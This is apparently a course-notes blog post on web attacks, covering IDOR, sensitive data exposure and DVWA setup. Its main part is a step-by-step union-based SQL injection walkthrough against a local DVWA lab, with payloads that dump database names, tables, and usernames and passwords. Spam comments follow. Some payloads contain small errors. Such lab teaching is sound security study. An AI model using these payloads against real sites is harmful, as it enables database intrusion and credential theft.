How to Use SQL Injection Attack Tutorial In Web Applications

SESSION 10
==========

METHODS USED IN WEB APPLICATIONS
================================
1. GET – It is the method used by web applications which is unsecure and show all the transmitting data from the web application UI to its Database or server. Requests data from a specified resource.
eg. php?id=1, ?cat=54, ?test=query.

2. POST – The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php

———————————————————-

INSECURE DIRECT OBJECT REFERENCE
================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, Attackers can directly access the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.

For eg. :

CHJM Website :

Accessing into another user –
www.chjm.org/login/…/php?id=1411 (ALEX)
www.chjm.org/login/../php?id=1411 ( entered into Logan’s Account)

Accessing into pages which are not authorized to a basic user-
www.chjm.org/user/../settings/config.html

www.chjm.org/login/../php?id=logan/settings/config.html

EG : arvindsharma.com > Login
arvindsharma.com/account/login.php
arvindsharma.com/account/user.php?id=1337

URL > arvindsharma.com
/account/ > fOLDER
user.php > Code

1337 > Sanjeev Multani
Kshitij > 1111 > 1337 > Sanjeev’s account

———————————————————-

SENSITIVE DATA EXPOSURE
=======================
Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.

Types of Sensitive Data
=======================

1. Personal – Names, Address , Contact Numbers etc.
2. Confidential – ID,Passwords – Credentials, Aadhar No.
3. Financial – Bank Accounts numbers, credit cards, debity cards etc.
4. Health Information – Policies etc.

Demonstration on LVS.

———————————————————-

DVWA SETUP AND CONFIGURATION
============================
DVWA stands for Damn Vulnerable Web Application, it is PHP MySQL based Web Application which is a organisational based understanding Web Application Attacks for OWASP TOP 10 like LVS.

STEPS
=====
Copy zip file into C:\xampp\htdocs
Right click the zip file, click on extract here
start xampp server, start apache and mysql
Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and make password=””(empty).
Open the browser, goto 127.0.0.1/dvwa
It will show you a message “Click here to create the Database”.
After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.
Go through the Instruction Page of LVS and then start learning through it.

———————————————————-

OWASP A1. INJECTIONS
=====================

UNION BASED SQL INJECTION
=========================
UNION BASED SQLI is a type of attack in which a attacker inputs some kind of malicious sql queries in the input method of the web application, and it get affected on the database resiulting out by extracting the “juicy” data.

DATABASE > TABLES > COLUMNS > ROWS

–+ : FOR ANY COMMAND I ENTER INTO THE INPUT METHOD, I HAVE TO ENTER –+ AFTER THAT TO MAKE IT A SQL QUERY.

# :

information schema

database()

version()

table_name – Table ka naam

column_name – Column ka naam

Information ki maa

TERMINOLOGIES
=============
1. Information Schema : It has all of the data regarding every databases, tables, columns and every other detail of a Database. It is considered as the mother of Informations in Database.
2. –+ : Everything written with –+ would be acted like a SQL QUERY.
3. # : Everything entered after # will not be considered.
4. database() – name of the database
5. version() – version of the database.

Target – http://127.0.0.1/dvwa/vulnerabilities/sqli/

STEPS – For SQLi always recommend to use Firefox, as special symbols and spaces does not get converted into URL encode

STEPS
======

Step 1: To find the GET Method/Parameter
eg. php?id=1
?cat=24
?test=query
Trying to click each and every possible link or will give inputs to the search boxes of GET Method.

“http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#”

Step 2: Check if my site is Vulnerable or not to Union Based SQLI
?id=1′
php?id=1′
If we get an error that means my website is vulnerable to Union Based SQLI.

It will give – “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ &Submit=Submit#
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”1”’ at line 1 “

Step 3: To check the number of columns present in the database
order by 100–+
order by 200–+
order by 300–+
Until we get an error of “Unknown Order Clause”.

Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 1–+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 2–+&Submit=Submit#
127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ order by 3–+&Submit=Submit#
Unknown column ‘3’ in ‘order clause’

Step 4: To Union Select the columns which are present in the Database and is Vulnerable
union select 1,2–+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ union select 1,2–+ &Submit=Submit#

Step 5: Extracting Information from Database
– database()
– version()
– union select version(),2–+
– union select 1,version()–+

– union select all 1,version()–+ : 10.1.25-MariaDB
– union select all 1,database()–+ : dvwa

Step 6: Calling the Mother of Database – information_schema

= Extracting Table Names
– union select all 1,table_names from information_schema.tables–+

http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ union select all 1,table_name from information_schema.tables–+&Submit=Submit#

= After Selecting a Juicy Table, Extracting data of that table :
– column_name, information_schema.columns

– union select all 1, columns_name from information_schema.columns where table_name=”users”–+

= To get the data from columns (user, password)

– union select user,password from users–+
– http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1′ group_concat(user,0x0a,password),2 from users–+

And we will get the Juicy Data.

——————————————————————————-

TESTING WEBSITES
================
1. http://demo.testfire.net/
2. http://testphp.vulnweb.com/

3 comments on “How to Use SQL Injection Attack Tutorial In Web Applications
  1. I cling on to listening to the newscast speak about getting free online grant applications so I have been looking around for the top site to get one. Could you advise me please, where could i acquire some?

  2. I was just searching for this info for some time. After 6 hours of continuous Googleing, finally I got it in your site. I wonder what’s the lack of Google strategy that don’t rank this kind of informative web sites in top of the list. Normally the top sites are full of garbage.

  3. Celeste Ehly says:

    I discovered more a new challenge on this weight loss issue. 1 issue is that good nutrition is tremendously vital while dieting. An enormous reduction in junk food, sugary food, fried foods, sugary foods, pork, and bright flour products could be necessary. Having wastes unwanted organisms, and contaminants may prevent objectives for fat-loss. While specific drugs temporarily solve the issue, the horrible side effects aren’t worth it, and they also never supply more than a momentary solution. It can be a known incontrovertible fact that 95 of fad diets fail. Thank you for sharing your notions on this web site.

Leave a Reply

Your email address will not be published. Required fields are marked *

*